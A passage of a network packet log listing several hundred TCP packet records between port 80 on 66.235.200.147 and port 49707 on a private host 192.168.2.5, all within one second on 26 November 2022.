Nov 26, 2022 11:17:42.649914980 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.649935007 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.649935961 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.649954081 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.649971962 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.649972916 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.649991989 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650008917 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650027990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650038004 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.650047064 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650063992 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.650064945 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650084019 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650100946 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.650101900 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650120020 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650130987 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.650139093 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650156975 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650165081 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.650176048 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650194883 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650213003 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.650213957 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650233030 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650243044 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.650252104 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650269985 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650283098 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.650289059 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650307894 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650316954 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.650326967 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650346041 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650365114 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650369883 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.650382996 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650394917 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.650402069 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650427103 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650429010 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.650445938 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650464058 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650465965 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.650482893 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650501966 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650506020 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.650518894 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650540113 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650542974 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.650558949 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650577068 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650593996 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650595903 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.650613070 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650631905 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650634050 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.650650024 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650659084 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.650670052 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650681973 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.650688887 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650707006 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650727034 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650738955 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.650744915 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650760889 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.650763988 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650783062 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650800943 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650820971 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650824070 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.650839090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650845051 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.650857925 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650886059 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.650914907 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.650976896 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.651067019 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.651084900 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.651103973 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.651124001 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.651127100 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.651143074 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.651163101 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.651173115 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.651180983 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.651197910 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.651199102 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.651217937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.651236057 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.651252031 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.651268959 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.651278973 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.651304007 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.651323080 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.651355982 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.651384115 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.651402950 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.651418924 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.651422977 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.651441097 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.651460886 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.651475906 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.651480913 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.651499033 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.651515961 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.651521921 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.651539087 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.651587963 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.651606083 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.651611090 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.651624918 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.651626110 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.651664019 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.651763916 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.652236938 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.652255058 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.652339935 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.652340889 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.652359962 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.652379990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.652399063 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.652419090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.652434111 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.652436972 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.652455091 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.652456999 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.652476072 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.652476072 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.652496099 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.652513027 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.652515888 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.652530909 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.652574062 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.652586937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.652605057 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.652631998 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.652647972 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.652667999 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.652687073 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.652702093 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.652730942 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.652736902 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.652750969 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.652769089 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.652786970 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.652796984 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.652806044 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.652825117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.652838945 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.652858973 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.652875900 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.652877092 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.653026104 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.653584003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.653603077 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.653620958 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.653637886 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.653654099 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.653677940 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.653680086 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.653700113 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.653733969 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.653776884 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.653808117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.653826952 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.653845072 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.653846025 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.653879881 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.653889894 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.653898954 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.653917074 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.653935909 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.653945923 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.653985977 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.653995037 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.654015064 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.654052973 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.654130936 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.654150009 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.654189110 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.654191971 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.654325008 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.654342890 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.654381037 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.654385090 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.654418945 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.654449940 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.654468060 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.654710054 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.654755116 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.654758930 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.654795885 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.654825926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.654844046 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.654863119 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.654891014 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.654905081 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.654922962 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.654942036 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.654959917 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.654977083 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.654978991 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.654998064 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.655000925 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.655016899 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.655016899 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.655035973 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.655056000 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.655073881 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.655076981 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.655097008 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.655097961 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.655114889 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.655134916 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.655152082 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.655153990 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.655169964 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.655179024 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.655188084 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.655205965 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.655209064 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.655225039 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.655245066 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.655263901 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.655267000 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.655281067 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.655288935 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.655299902 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.655323982 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.655344009 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.655361891 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.655380011 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.655399084 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.655407906 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.655417919 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.655424118 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.655459881 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.655492067 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.655509949 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.655528069 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.655548096 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.655571938 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.655580997 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.655595064 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.655600071 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.655618906 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.655637026 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.655642986 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.655656099 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.655673981 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.655692101 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.655698061 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.655725956 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.655740023 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.655756950 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.655776024 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.655800104 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.655824900 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.655837059 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.655855894 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.655874014 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.655891895 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.655896902 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.655922890 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.656303883 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.656322002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.656341076 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.656377077 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.656385899 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.656404018 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.656423092 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.656423092 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.656443119 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.656461000 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.656481028 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.656481981 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.656498909 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.656510115 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.656517982 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.656537056 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.656542063 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.656557083 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.656574965 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.656725883 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.656744957 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.656791925 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.656816959 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.656855106 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.656902075 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.656922102 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.656939983 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.656980038 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.657011032 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.657030106 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.657048941 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.657053947 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.657067060 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.657085896 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.657102108 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.657126904 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.657399893 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.657418966 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.657437086 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.657457113 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.657466888 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.657490969 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.657500982 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.657519102 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.657537937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.657557964 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.657579899 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.657593012 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.657603979 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.657612085 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.657630920 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.657660961 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.657675028 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.657699108 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.657706976 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.657821894 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.657840014 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.657887936 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.657959938 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.657977104 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.657994986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658014059 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658018112 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.658030987 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658032894 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.658049107 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658066034 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658068895 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.658082962 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658109903 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.658118010 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658135891 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.658154011 CET	80	49707	66.235.200.147	192.168.2.5
